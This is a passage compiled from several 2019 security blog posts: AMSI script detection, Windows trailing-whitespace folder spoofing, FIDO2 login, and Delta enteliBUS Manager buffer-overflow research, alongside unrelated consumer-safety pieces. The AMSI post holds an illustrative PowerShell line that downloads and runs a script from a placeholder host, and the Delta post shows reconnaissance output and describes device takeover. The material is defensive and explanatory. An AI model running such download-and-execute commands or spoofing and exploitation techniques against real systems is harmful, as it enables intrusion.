Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model

Conclusion

Remediating vulnerabilities promptly is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before official scores are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities, effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient; the current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication that a social component will be utilized in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. It was originally presented at NAACL in June 2019; our paper describes the work in more detail, and it was also covered by Wired.

The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End?

In this series of three blogs (you can find part 1 here and part 2 here), we have so far covered the implications of promoting files to “Evil Twins,” which can be created and remain in the system as distinct entities once case sensitivity is enabled, as well as some issues that can arise from naive assumptions about case sensitivity during development.

In this third post we focus on the “confusion” technique: even though the technique itself is already known (Medium / Tyranidslair), its ramifications have not been fully analyzed.

Going back to normalization, some Win32 APIs remove trailing whitespace (and other special characters) from the path name.
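Python cannot call those Win32 routines from other platforms, but the stripping behavior at the heart of the trick can be emulated for illustration (this mimics, rather than calls, the Win32 normalization, which is more involved in practice):

```python
def emulate_win32_normalize(path):
    """Illustrative emulation only: strip trailing spaces and dots
    from the final path component, as several Win32 path APIs do.
    The real normalization handles many more cases."""
    head, sep, tail = path.rpartition("\\")
    return head + sep + tail.rstrip(" .")

# "C:\Windows " and "C:\Windows" normalize to the same path,
# which is the root of the confusion technique
a = emulate_win32_normalize("C:\\Windows ")
b = emulate_win32_normalize("C:\\Windows")
```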

As mentioned in the last publication, the normalization can, in some cases, provide the wrong result.

The common scenario that could be used as “bait” for the user to click, and even to hide what is seen, is to create a directory with the same name ending with a whitespace.

A very trivial example “That’s not my notepad…..”:

Open Task Manager, right-click the “notepad” entry with the PuTTY icon -> Properties. (The properties were read from the non-trailing-space binary.)

Open Explorer on “C:\Windows “; it will generate the illusion that the original files (from the folder without trailing whitespace) are there. This will happen for any folder/file not present in the whitespace version.

Screenshots opening a McAfee Agent Folder:

Both folders are open; note that the whitespace version does not contain any .dll or additional .exe files, yet Explorer renders the missing files from the normalized, non-whitespace directory.

Trying to open the dll…

Getting properties from Task Manager will fetch those from the normalized folder path, which means you can be tricked into thinking it is a trusted app.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Related Links / Blogs:

https://tyranidslair.blogspot.com/2019/02/ntfs-case-sensitivity-on-windows.html

https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e

The post The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End? appeared first on McAfee Blogs.

Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season

With summer coming to a close, it’s almost time for back to school! Back to school season is an exciting time for students, especially college students, as they take their first steps towards independence and embark on journeys that will shape the rest of their lives. As students across the country prepare to start or return to college, we here at McAfee have revealed new findings indicating that many are not proactively protecting their academic data. Here are the key takeaways from our survey of 1,000 Americans, ages 18-25, who attend or have attended college:

Education Needs to Go Beyond the Normal Curriculum

While many students are focused on classes like biology and business management, very few get proper exposure to cybersecurity knowledge. 80% of students have been affected by a cyberattack or know a friend or family member who has. However, 43% don’t think they will ever be a victim of a cybercrime.

Educational institutions are very careful to promote physical safety, but what about cyber safety? It turns out only 36% of American students claim they have learned how to keep personal information safe through school resources, and 42% of our respondents say they learn the most about cybersecurity from the news. To improve cybersecurity education, colleges and universities should take responsibility for training students on how to keep their academic data safe from cybercriminals.

Take Notes on Device Security

Believe it or not, many students fail to secure all of their devices, opening them up to even more vulnerabilities. While half of students have security software installed on their personal computers, this isn’t the case for their tablets or smartphones. Only 37% of students surveyed have smartphone protection, and only 13% have tablet protection. What’s more, about one in five (21%) students don’t use any cybersecurity products at all.

Class Dismissed: Cyberattacks Targeting Education Are on the Rise

According to data from McAfee Labs, cyberattacks targeting education in Q1 2019 have increased by 50% from Q4 2018. The combination of many students being uneducated in proper cybersecurity hygiene and the vast array of shared networks that these students are simultaneously logged onto gives cybercriminals plenty of opportunities to exploit when it comes to targeting universities. Some of the attacks utilized include account hijacking and malware, which made up more than 70% of attacks on these institutions from January to May of 2019. And even though these attacks are on the rise, 90% of American students still use public Wi-Fi and only 18% use a VPN to protect their devices.

Become a Cybersecurity Scholar

In order to go into this school year with confidence, students should remember these security tips:

  • Never reuse passwords. Use a unique password for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. You can also use a password manager so you don’t have to worry about remembering various logins.
  • Always set privacy and security settings. Anyone with access to the internet can view your social media if it’s public. Protect your identity by turning your profiles to private so you can control who can follow you. You should also take the time to understand the various security and privacy settings to see which work best for your lifestyle.
  • Use the cloud with caution. If you plan on storing your documents in the cloud, be sure to set up an additional layer of access security. One way of doing this is through two-factor authentication.
  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to keep your connection secure.
  • Discuss cyber safety often. It’s just as important for families to discuss cyber safety as it is for them to discuss privacy on social media. Talk to your family about ways to identify phishing scams, what to do if you may have been involved in a data breach, and invest in security software that scans for malware and untrusted sites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Dorms, Degrees, and Data Security: Prepare Your Devices for Back to School Season appeared first on McAfee Blogs.

Making authentication even easier with FIDO2-based local user verification for Google Accounts


Passwords, combined with Google's automated protections, help secure billions of users around the world. But, new security technologies are surpassing passwords in terms of both strength and convenience. With this in mind, we are happy to announce that you can verify your identity by using your fingerprint or screen lock instead of a password when visiting certain Google services. The feature is available today on Pixel devices and coming to all Android 7+ devices over the next few days.



Simpler authentication experience when viewing your saved password for a website on passwords.google.com


These enhancements are built using the FIDO2 standards, W3C WebAuthn and FIDO CTAP, and are designed to provide simpler and more secure authentication experiences. They are a result of years of collaboration between Google and many other organizations in the FIDO Alliance and the W3C.

An important benefit of using FIDO2 versus interacting with the native fingerprint APIs on Android is that these biometric capabilities are now, for the first time, available on the web, allowing the same credentials to be used by both native apps and web services. This means that a user only has to register their fingerprint with a service once, and the fingerprint will then work for both the native application and the web service.

Note that your fingerprint is never sent to Google’s servers; it is securely stored on your device, and only a cryptographic proof that you’ve correctly scanned it is sent to Google’s servers. This is a fundamental part of the FIDO2 design.

Here is how it works

Google is using the FIDO2 capability on Android to register a platform-bound FIDO credential. We remember the credential for that specific Android device. Now, when the user visits a compatible service, such as passwords.google.com, we issue a WebAuthn “Get” call, passing in the credentialId that we got when creating the credential. The result is a valid FIDO2 signature.
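Per the W3C WebAuthn spec, the payload that the relying party verifies is the authenticator data concatenated with the SHA-256 hash of the client data JSON. A minimal sketch of rebuilding that payload (the byte values here are placeholders, not real protocol data):

```python
import hashlib

def webauthn_signed_payload(authenticator_data, client_data_json):
    """Rebuild the byte string a FIDO2 assertion signature covers:
    authenticatorData || SHA-256(clientDataJSON). The relying party
    then verifies the signature over this payload with the public
    key registered when the credential was created."""
    client_data_hash = hashlib.sha256(client_data_json).digest()
    return authenticator_data + client_data_hash

# 37 bytes is the minimum authenticator data length
# (32-byte rpIdHash + 1-byte flags + 4-byte counter)
payload = webauthn_signed_payload(b"\x00" * 37,
                                  b'{"type":"webauthn.get"}')
```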


High-level architecture of using fingerprint or screen lock on Android devices to verify a user’s identity without a password

Please follow the instructions below if you’d like to try it out.
Prerequisites
  • Phone is running Android 7.0 (Nougat) or later
  • Your personal Google Account is added to your Android device
  • Valid screen lock is set up on your Android device
To try it
  • Open the Chrome app on your Android device
  • Navigate to https://passwords.google.com
  • Choose a site to view or manage a saved password
  • Follow the instructions to confirm that it’s you trying to sign in
You can find more detailed instructions here.

For additional security
Remember, Google's automated defenses securely block the overwhelming majority of sign-in attempts even if an attacker has your username or password. Further, you can protect your accounts with two-step verification (2SV), including Titan Security Keys and Android phone’s built-in security key.

Both security keys and local user verification based on biometrics use the FIDO2 standards. However, these two protections address different use cases. Security keys are used as a second factor in 2SV when bootstrapping a new device, to make sure it is the account’s rightful owner accessing it. Local user verification based on biometrics comes after a device has been bootstrapped and can be used for re-authentication during step-up flows to verify the identity of the already signed-in user.

What’s next
This new capability marks another step on our journey to making authentication safer and easier for everyone to use. As we continue to embrace the FIDO2 standard, you will start seeing more places where local alternatives to passwords are accepted as an authentication mechanism for Google and Google Cloud services. Check out this presentation to get an early glimpse of the use cases that we are working to enable next.

McAfee AMSI Integration Protects Against Malicious Scripts

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how AMSI (Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of malware since the start of 2019. This blog will show you how to enable it, and explain why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above

The AMSI scanner will scan scripts once they have been executed. This enables the scanner to de-obfuscate the script and scan it using DAT content. This is useful as the original scripts can be heavily obfuscated and are difficult to generically detect, as shown in the image below:

Figure 1 – Obfuscated VBS script being de-obfuscated with AMSI
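A toy illustration of why scanning at execution time defeats simple obfuscation: a command that is base64-wrapped on disk must be decoded before it runs, and it is that decoded buffer the antimalware interface is handed (the command string and URL below are made up for the example):

```python
import base64

# A hypothetical obfuscated one-liner: the command exists only in
# base64 form in the on-disk script...
obfuscated = base64.b64encode(
    b"IEX (New-Object Net.WebClient)"
    b".DownloadString('http://example.test/p.ps1')")

# ...but at run time the interpreter must decode it, and the runtime
# scan interface receives the decoded buffer, where DAT signatures
# can match the plaintext directly.
decoded = base64.b64decode(obfuscated)
```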

Enable the Scanner

By default, the AMSI scanner is set to observe mode. This means that the scanner is running but will not block any detected scripts; instead, detections will appear in the ENS log and event viewer as shown below:

Figure 2 – Would Block in the Event log

To actively block the detected threats, you need to de-select the following option in the ENS settings:

Figure 3 – How to enable Blocking

Once this has been done, the event log will show that the malicious script has now been blocked:

Figure 4 – Action Blocked in Event Log

In the Wild

Since January 2019, we have observed over 650,000 detections, as shown in the IP Geo Map below:

Figure 5 – Geo Map of all AMSI detection since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, Fileless MimiKatz and JS downloader families such as JS/Nemucod.

The section below describes how these families operate, and their infection spread across the globe.

PowerMiner

PowerMiner is cryptocurrency-mining malware whose purpose is to infect as many machines as possible to mine Monero. The initial infection vector is phishing emails which contain a batch file. Once executed, this batch file downloads a malicious PowerShell script which then begins the infection process.

The infection flow is shown in the graph below:

Figure 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

Figure 7 – Geo Map of PS/PowerMiner!ams detection since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz

Mimikatz is a tool which enables the extraction of passwords from the Windows LSASS. Mimikatz was previously used as a standalone tool; however, malicious scripts have been created which download Mimikatz into memory and then execute it without it ever being written to the local disk. An example of a fileless Mimikatz script is shown below (note: this can be heavily obfuscated):

Figure 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

Figure 9 – Geo IP Map of PS/Mimikatz detection since January 2019

McAfee can detect this malicious script as PS/Mimikatz.a, PS/Mimikatz.b, PS/Mimikatz.c.

JS/Downloader

JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads such as ransomware, password stealers and backdoors to further exploit the compromised machine. The infection chain is shown below, as well as an example phishing email:

Figure 10 – Infection flow of Js/Downloader

Figure 11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

Figure 12 – Geo Map of AMSI-FAJ detection since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.

MVISION Endpoint and ENS 10.7

MVISION Endpoint and ENS 10.7 (not yet released) will use Real Protect machine learning to detect PowerShell AMSI-generated content.

This is done by extracting features from the AMSI buffers and running these against the ML classifier to decide if the script is malicious or not. An example of this is shown below:


Thanks to this detection technique, MVISION EndPoint can detect Zero-Day PowerShell threats.
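The post does not document the classifier’s actual features, but a common choice for script buffers is simple statistics such as Shannon entropy plus suspicious-keyword counts; the sketch below is purely illustrative:

```python
import math
from collections import Counter

def buffer_features(script):
    """Toy feature vector for a script buffer: Shannon entropy
    (obfuscated text tends to score high) plus counts of a few
    suspicious keywords. Illustrative only; the real classifier's
    features are not documented in the post."""
    counts = Counter(script)
    total = len(script)
    entropy = -sum((c / total) * math.log2(c / total)
                   for c in counts.values())
    keywords = ("Invoke-Expression", "DownloadString", "FromBase64String")
    return [entropy] + [script.count(k) for k in keywords]

fv = buffer_features(
    "IEX (New-Object Net.WebClient).DownloadString('http://x')")
```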

Conclusion

We hope that this blog has helped highlight why enabling AMSI is important and how it will help keep your environments safe.

We recommend our customers who are using ENS 10.6 on a Windows 10 environment enable AMSI in ‘Block’ mode so that when a malicious script is detected it will be terminated. This will protect Endpoints from the threats mentioned in this blog, as well as countless others.

Customers using MVISION EndPoint are protected by default and do not need to enable ‘Block’ mode.

We also recommend reading McAfee Protects against suspicious email attachments which will help protect you against malware being spread via email, such as the JS/Downloaders described in this blog.

All testing was performed with the V3 DAT package 3637.0 which contains the latest AMSI Signatures. Signatures are being added to the V3 DAT package daily, so we recommend our customers always use the latest ones.

The post McAfee AMSI Integration Protects Against Malicious Scripts appeared first on McAfee Blogs.

UPDATE: ACSC confirms potential exploitation of BlueKeep vulnerability

Thousands of Australian businesses using older Windows systems should immediately install a patch to avoid being compromised. The Australian Signals Directorate (ASD) is aware of malicious activity that indicates potential widespread abuse of the BlueKeep vulnerability known as CVE-2019-0708, affecting older versions of Windows operating systems including the Windows Vista, Windows 7, Windows XP, Server 2003 and Server 2008 operating systems.

From Watergate to El Paso: should we be relying on unelected bodies to protect us? | John Naughton

Web security firm Cloudflare’s decision to terminate 8chan as a customer is welcome, but risks setting a dangerous precedent

Last Saturday morning, a gunman armed with an assault rifle walked into a Walmart store in El Paso, Texas, and shot 22 people dead and injured 24 more. Shortly before he did so, a post by him appeared on the /pol/ [politically incorrect] message board of the far-right website 8chan. Attached to it was a four-page “manifesto”. The 8chan thread was quickly deleted by a site moderator (it was news to me that 8chan had moderators), but archived copies of it rapidly circulated on the internet.

“There is nothing new in this killer’s ramblings,” wrote one analyst who had read it. “He expresses fears of the same ‘replacement’ of white people that motivated the Christchurch shooter and notes that he was deeply motivated by that shooter’s manifesto.”

Continue reading...

How to Help Kids Steer Clear of Digital Drama this School Year

Editor’s note: This is Part II of helping kids manage digital risks this new school year. Read Part I.

The first few weeks back to school can be some of the most exciting yet turbulent times of the year for middle and high schoolers. So as brains and smartphones shift into overdrive, a parent’s ability to coach kids through digital drama is more critical than ever.

Paying attention to these risks is the first step in equipping your kids to respond well to any challenges ahead. Kids face a troubling list of social realities their parents never had to deal with such as cyberbullying, sexting scandals, shaming, ghosting, reputation harm, social anxiety, digital addiction, and online conflict.

As reported by internet safety expert and author Sue Scheff in Psychology Today, recent studies also reveal that young people are posting under the influence and increasingly sharing risky photos. Another study cites that 20 percent of teens and 33 percent of young adults have posted risky photos and about 8 percent had their private content forwarded without their consent.

No doubt, the seriousness of these digital issues is tough to read about, but imagine living with the potential for a digital misstep each day. Consider:

  • How would you respond to a hateful or embarrassing comment on one of your social posts?
  • What would you do if your friends misconstrued a comment you shared in a group text and collectively started shunning you?
  • What would you do if you discovered a terrible rumor circulating about you online?
  • Where would you turn? Where would you find support and guidance?

If any of these questions made you anxious, you understand why parental attention and intention are more important today than ever. Here are just a few of the more serious sit-downs to have with your kids as the new school year gets underway.

Let’s Talk About It

Define digital abuse. For kids, the digital conversation never ends, which makes it easier for unacceptable behaviors to become acceptable over time. Stepping daily into a cultural melting pot of values and behaviors can blur the lines for a teenage brain that is still developing. For this reason, it’s critical to define inappropriate behavior such as cyberbullying, hate speech, shaming, crude jokes, sharing racy photos, and posting anything intended to hurt another person.

If it’s public, it’s permanent. Countless reputations, academic pursuits, and careers have been shattered because someone posted reckless digital content. Everything — even pictures shared between best friends in a “private” chat or text — is considered public. Absolutely nothing is private or retractable. That includes impulsive tweets or contributing to an argument online.

Steer clear of drama magnets. If you’ve ever witnessed your child weather an online conflict, you know how brutal kids can be. While conflict is part of life, digital conflict is a new level of destruction that should be avoided whenever possible. Innocent comments can quickly escalate out of control. Texting compromises intent and distorts understanding. Immaturity can magnify miscommunication. Encourage your child to steer clear of group texts, gossip-prone people, and topics that can lead to conflict.

Mix monitoring and mentoring. Kids inevitably will overshare personal details, say foolish things, and make mistakes online. Expect a few messes. To guide them forward, develop your own balance of monitoring and mentoring. To monitor, know what apps your kids use and routinely review their social conversations (without commenting on their feeds). Also, consider a security solution to help track online activity. As a mentor, listening is your superpower. Keep the dialogue open, honest, and non-judgmental and let your child know that you are there to help no matter what.

Middle and high school years can be some of the most friendship-rich and perspective-shaping times in a person’s life. While drama will always be part of the teenage equation, digital drama and its sometimes harsh fallout don’t have to be. So take the time to coach your kids through the rough patches of online life so that, together, you can protect and enjoy these precious years.

The post How to Help Kids Steer Clear of Digital Drama this School Year appeared first on McAfee Blogs.

From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager

Management. Control. It seems that you can’t stick five people in a room together without one of them trying to order the others around. This tendency towards centralized authority is not without reason, however – it is often more efficient to have one person, or thing, calling the shots. For an example of the latter, one needs look no further than Delta’s enteliBUS Manager, or eBMGR. Put simply, this device aims to centralize control for various pieces of hardware often found in corporate or industrial settings, whether it be temperature and humidity controls for a server room, a boiler and its corresponding alarms and sensors in a factory, or access control and lighting in a business. The advantages seem obvious, too – it can be configured to adjust fan speeds according to thermostat readings or sound an alarm if pressure crosses a certain threshold, all with little human interaction.

The disadvantages, while less obvious, become clear when one considers tech-savvy malicious actors. Suddenly, your potentially critical system now has a single point of failure, and one that is attached to a network, to make matters worse.

Consider for a moment a positive pressure room in a hospital, the kind typically used to keep out contaminants during surgeries. Managing rooms such as these is a typical application for the eBMGR and it does not take an overactive imagination to envision what kind of damage a bad actor could cause if they disrupted such a sensitive environment.

Management. Control. That’s what’s at stake if a device such as this is not properly secured. It’s also what made this device such a high priority for McAfee’s Advanced Threat Research team. The decision to make network-connected critical systems such as these demands an extremely high standard of software security – finding where it might fall short is precisely our job.

With these stakes in mind, our team went to work. We began by hooking up an eBMGR unit to a network with several other devices to simulate an environment somewhat true to life. Using a technique known as “fuzzing”, we then blasted the device with all kinds of deliberately malformed network traffic, looking for a chink in the armor. That is one advantage often afforded to the bad guys in software security; they can make many mistakes; manufacturers need only make one.
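As a toy illustration of mutation-based fuzzing of network inputs (the real tooling and the device’s protocol details are not disclosed in this post; the packet bytes below are arbitrary stand-ins):

```python
import random

PACKET = b"\x81\x0a\x00\x12deadbeefdeadbeef"  # arbitrary stand-in for a valid packet

def mutate(packet, n_flips=4, seed=None):
    """One mutation-based fuzzing step: XOR a few random bytes of a
    valid packet to produce a malformed variant. Illustrative only;
    the actual fuzzing tooling used is not described in the post."""
    rng = random.Random(seed)
    data = bytearray(packet)
    for _ in range(n_flips):
        i = rng.randrange(len(data))
        data[i] ^= rng.randrange(1, 256)  # non-zero XOR, so the byte changes
    return bytes(data)

variant = mutate(PACKET, seed=1)
```

A fuzzer generates thousands of such variants, sends them at the target, and watches for crashes or hangs that hint at memory-safety bugs.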

Perhaps unsurprisingly, persistence and creativity led us to discover one such mistake: a mismatch in the memory sizes used to handle incoming network data created what is often referred to as a buffer overflow vulnerability. This seemingly innocuous mistake rendered the eBMGR vulnerable to our carefully crafted network attack, which allows a hacker on the same network to gain complete control of the device’s operating system. Worse still, the attack uses what is known as broadcast traffic, meaning they can launch the attack without knowing the location of the targets on the network. The result is a twisted version of Marco Polo – the hacker needs only shout “Marco!” into the darkness and wait for the unsuspecting targets to shout “Polo!” in response.
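The “broadcast” half of that Marco Polo corresponds to a socket configured like the sketch below. The port in the comment is an assumption based on BACnet/IP’s default, since the device’s exact protocol details are not given here, and the probe payload is intentionally omitted:

```python
import socket

def make_broadcast_socket():
    """UDP socket configured for broadcast: the 'shout Marco into
    the darkness' setup. Datagrams sent to 255.255.255.255 reach
    every host on the local segment, so the attacker needs no
    target address at all."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    return s

s = make_broadcast_socket()
# If the device speaks BACnet/IP, a probe would target UDP 47808
# (BACnet's default port); the payload itself is omitted here:
# s.sendto(probe_payload, ("255.255.255.255", 47808))
s.close()
```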

In this field, complete control of the operating system is typically the finish line. But we weren’t content with just that. After all, controlling the eBMGR on its own is not all that interesting; we wanted to see if we could use it to control all the devices it was connected to. Unfortunately, we did not have the source code for the device’s software, so this new goal proved non-trivial.

We went back to the drawing board and acquired some additional hardware that the Delta device might realistically be charged with managing and had a certified technician program the device just as he would for a real-world client – in our case, as an HVAC controller. Our strategy quickly became what is often referred to as a replay attack. As an example, if we wanted to determine how to tell the device to flip a switch, we would first observe the device flipping the switch in the “normal” way and try to track down what code had to run for that to happen. Next, we would try to recreate those conditions by running that code manually, thus replaying the previously observed event. This strategy proved effective in granting us control over every category of device the eBMGR supports. Moreover, this method remains agnostic to the specific hardware attached to the building manager. Hypothetically, this sort of attack would work without any prior knowledge of the device’s configuration.

The result was an attack that would compromise any enteliBUS Manager on the same network and attach a custom piece of malware we developed to the software running on it. This malware would then create a backdoor which would allow the attacker to remotely issue commands to the manager and control any hardware connected to it, whether it be something as benign as a light switch or as dangerous as a boiler.

To make matters worse, if the attacker knows the IP address of the device ahead of time, this exploit can be performed over the Internet, increasing its impact exponentially. At the time of this writing, a Shodan scan revealed that over 1600 such devices are internet connected, meaning the danger is far from hypothetical.

For those craving the nitty-gritty technical details of how we went about accomplishing this, we also published what is arguably a novella here that delves into the vulnerability discovery and exploitation process from start to finish.

In keeping with our responsible disclosure program, we reached out to Delta Controls as soon as we confirmed that the initial vulnerability we discovered was exploitable. Shortly thereafter, they provided us with a beta version of a patch meant to fix the vulnerability and we confirmed that it did just that – our attack no longer worked. Furthermore, by using our understanding of how the attack is performed at a network level, we were able to add mitigation for this vulnerability to McAfee’s Network Security Platform (NSP) via NSP signature 0x45d43f00, helping our customers remain secure. This is our idea of a success story – researchers and vendors coming together to improve security for end users and ultimately reduce the attack surface for the adversary. If there’s any doubt they are interested in targets like these, a quick search will illuminate the myriad attempts to exploit industrial control systems as a top target of interest.

Before we leave you with “all’s well that ends well”, we want to stress that there is a lesson to be learned here: it doesn’t take much to make a critical system vulnerable. Thus, it is important that companies extend proper security practices to all network-connected devices – not just PCs. Such practices might include placing all internet-connected devices behind a firewall, monitoring traffic to these devices, segregating them from the rest of the network using VLANs, and staying on top of security updates. For critical systems that cannot afford significant downtime, updates are often pulled instead of pushed, putting the onus on end users to keep these devices up to date. Whatever the precise implementation may be, a good security policy often begins by adopting the principle of least privilege, or the idea that all access should be restricted by default unless there is a compelling reason for it. For example, before approaching the challenge of keeping a device like the eBMGR secure on the internet, it’s important to first ask if having it connected to the internet is necessary in the first place.

While companies and consumers should certainly take the proper steps to keep their networks secure, manufacturers must also take a proactive approach towards addressing vulnerabilities that impact their end users. Delta Controls’ willingness to collaborate and timely response to our disclosure certainly seems like a step in the right direction. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager appeared first on McAfee Blogs.

HVACking: Understanding the Delta Between Security and Reality

The McAfee Labs Advanced Threat Research team is committed to uncovering security issues in both software and hardware to help developers provide safer products for businesses and consumers. We recently investigated an industrial control system (ICS) produced by Delta Controls. The product, called “enteliBUS Manager”, is used for several applications, including building management. Our research into the Delta controller led to the discovery of an unreported buffer overflow in the “main.so” library. This flaw, identified by CVE-2019-9569, ultimately allows for remote code execution, which could be used by a malicious attacker to manipulate access control, pressure rooms, HVAC and more. We reported this research to Delta Controls on December 7th, 2018. Within just a few weeks, Delta responded, and we began an ongoing dialog while a security fix was built, tested and rolled out in late June of 2019. We commend Delta for their efforts and partnership throughout the entire process.

The vulnerable firmware version tested by McAfee’s Advanced Threat Research team is 3.40.571848. It is likely that earlier versions of the firmware are also vulnerable; however, ATR has not specifically tested them. We have confirmed that the patched firmware version 3.40.612850 effectively remediates the vulnerability.

This blog is intended to provide a deep and thorough technical analysis of the vulnerability and its potential impact. For a high-level, non-technical walk through of this vulnerability, please refer to our summary blog post here.

Exploring the Attack Surface

The first task when researching a new device is to understand how it works, from both a software and a hardware perspective. Like many devices in the ICS realm, this device has three main software components: the bootloader, the system applications, and user-defined programming. While looking at software for an attack vector is important, we do not focus on any surface defined by the users, since this will potentially change for every install. Therefore, we want to focus on the bootloader and the system applications. On top of the operating system, it is common for manufacturers to implement custom code to operate the device regardless of an individual user’s programming. This custom code is often where most vulnerabilities exist, and it extends across the entire product install base.

Yet how do we access this code? As this is a critical system, the firmware and software are not publicly available and documentation is limited, so we are restricted to external reconnaissance of the underlying system software. Since the most critical vulnerabilities are remote, it made sense to start with a simple network scan of the device. A TCP scan showed no ports open, and a UDP scan showed only ports 47808 and 47809 to be open. Referring to the documentation, we determined these are most likely used for a protocol called Building Automation and Control Network (BACnet). Using a BACnet-specific network enumeration script, we determined slightly more information:

root@kali:~# nmap --script bacnet-info -sU -p 47808 192.168.7.15

Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 11:03 EDT
Nmap scan report for 192.168.7.15
Host is up (0.00032s latency).

PORT STATE SERVICE
47808/udp open bacnet
| bacnet-info: 
| Vendor ID: Delta Controls (8)
| Vendor Name: Delta Controls
| Object-identifier: 29000
| Firmware: 571848
| Application Software: V3.40
| Model Name: eBMGR-TCH

The next question is, what can we learn from the hardware? To answer this question, the device was first carefully disassembled, as shown in Figure 1.

Figure 1

The controller has one board to manage the display and a main baseboard which holds a System on a Module (SOM) chip containing both the processor and flash modules. Taking a closer look at the baseboard, we made a few key observations: the processor is an ARM926EJ core, the flash module is a ball grid array (BGA) chip, and there are several unpopulated headers on the board.

Figure 2

To examine the software more effectively, we needed to determine a method of extracting the firmware. The BGA chip used by the system for flash memory most likely holds the firmware; however, this poses another challenge. Unlike other chips, BGA chips do not provide externally accessible pins to attach to. This means that to access the chip directly, we would need to desolder it from the board, which is not ideal since we would risk damaging the system.

We also noticed several unpopulated headers on the board. This was promising, as one of them might offer an alternative method of extracting the firmware. Soldering pins to each of the unpopulated headers and using a logic analyzer, we determined that the 4-pin header in the center of the board is a universal asynchronous receiver-transmitter (UART) header running at a baud rate of 115200.

Figure 3

Using the Exodus XI Breakout board (shout out to @Logan_Brown and the Exodus team) to connect to the UART headers, we were met with an unprotected root prompt on the system. Now with full access to the system, we could start to gain a deeper understanding of how the system works and extract the firmware.

Figure 4

Firmware Extraction and System Analysis

With the UART interface, we could now explore the system in real-time, but how could we extract the firmware for offline analysis? The device has two USB ports which we were able to use to mount a USB drive. This allowed us to copy what is running in memory using dd onto a flash drive, effectively extracting the firmware. The next question was, what do we copy?

Using “/proc/mtd” to gain information about how memory is partitioned, we could see file systems located on mtd4 and mtd5, and we used dd to copy off both partitions. We later discovered that one of the images is a backup the system falls back to if a persistent issue is detected. This backup filesystem copy became increasingly useful as the project continued.
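The /proc/mtd table that guided this step is plain text and easy to parse. Below is a minimal sketch of how one might enumerate the partitions before imaging them with dd; the partition layout shown is purely hypothetical, and the real device’s names and sizes differ.

```python
# Parse the text of /proc/mtd to list partitions and sizes.
# The sample content below is hypothetical, not from the device.
sample = """dev:    size   erasesize  name
mtd0: 00040000 00020000 "bootloader"
mtd4: 08000000 00020000 "rootfs"
mtd5: 08000000 00020000 "rootfs-backup"
"""

def parse_proc_mtd(text):
    parts = {}
    for line in text.splitlines()[1:]:  # skip the header row
        dev, size, erasesize, name = line.split(maxsplit=3)
        parts[dev.rstrip(":")] = (int(size, 16), name.strip('"'))
    return parts

parts = parse_proc_mtd(sample)
for dev, (size, name) in parts.items():
    # Each entry is exposed as /dev/<dev>; imaging it is then a single
    # dd command, e.g. dd if=/dev/mtd4 of=/mnt/usb/mtd4.bin
    print(dev, hex(size), name)
```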

With the active UART connection, it was now possible to investigate more about how the system runs. Since we had previously determined that the device listens only on ports 47808 and 47809, whichever application is listening on those ports would be the only point of attack for a remote exploit. This was quickly confirmed using “netstat -nap” from the UART console.

We noticed that port 47808 was being used by an application called “dactetra”. With minimal further investigation, we determined that this Delta-specific binary is responsible for the main functions of the device.

Finding a Vulnerability

With a device-specific binary listening on the network via an open port, we had an ideal place to start looking for a vulnerability. We used the common approach of network fuzzing to start our investigation. To implement network fuzzing for BACnet, we turned to a tool produced by Synopsys called Defensics, which has a module designed for BACnet servers. Although this device is not a BACnet server and functions more as a router, this test suite provided several universal test cases which gave us a great place to start. BACnet utilizes several types of broadcast packets to communicate. Two such broadcast packets, “Who-Is” and “I-Am” packets, are universal to all BACnet devices and Defensics provides modules to work with them. Using the Defensics fuzzer to create mutations of these packets, we were able to observe the device encountering a failure point, producing a core dump and immediately rebooting, shown in Figure 5.

Figure 5

The test case which caused the crash was then isolated and run several more times to confirm the crash was repeatable. We discovered during this process that it takes an additional 96 packets sent after the original malformed packet to cause the crash. The malformed packet in the series was an “I-Am” packet, as seen below. The full packet is not shown due to its size.

Figure 6

